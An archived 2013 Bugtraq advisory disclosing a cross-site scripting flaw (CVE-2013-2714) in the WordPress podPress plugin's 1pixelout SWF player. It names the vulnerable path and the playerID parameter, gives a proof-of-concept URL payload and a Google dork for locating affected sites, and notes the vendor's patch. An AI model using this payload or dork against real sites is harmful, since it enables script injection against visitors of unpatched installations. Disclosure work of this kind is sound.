| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 28 Mar 2013 01:02:59 GMT
From: hip@...ight-labs.org
To: bugtraq@...urityfocus.com
Subject: WordPress podPress Plugin XSS in SWF
# Exploit Title: WordPress podPress Plugin XSS in SWF
# Release Date: 28/03/13
# Author: hip [Insight-Labs]
# Contact: hip@...ight-labs.org | Website: http://insight-labs.org
# Software Link: http://downloads.wordpress.org/plugin/podpress.8.8.10.17.zip
# Tested on: XPsp3
# Affected version: 8.8.10.13 before
# Google Dork: inurl:/wp-content/plugins/podpress/
# REF:CVE-2013-2714
———————————————————————————————————————–
# Introduction:
podPress adds a lot of features designed to make WordPress the ideal platform for hosting a podcast.
————————————————————————————————————————-
# XSS – Proof Of Concept:
vulnerable path:
/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf
vulnerabile parameter:playerID
POC:
/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf?playerID=\"))}catch(e){alert(/xss/)}//
————————————————————————————————————————-
————
Patch:
————
– Vendor was notified on the 25/02/2013
– Vendor released version 8.8.10.17 on 19/03/2013 Fixed the bug
————————————————————————————————————————-
Powered by blists - more mailing lists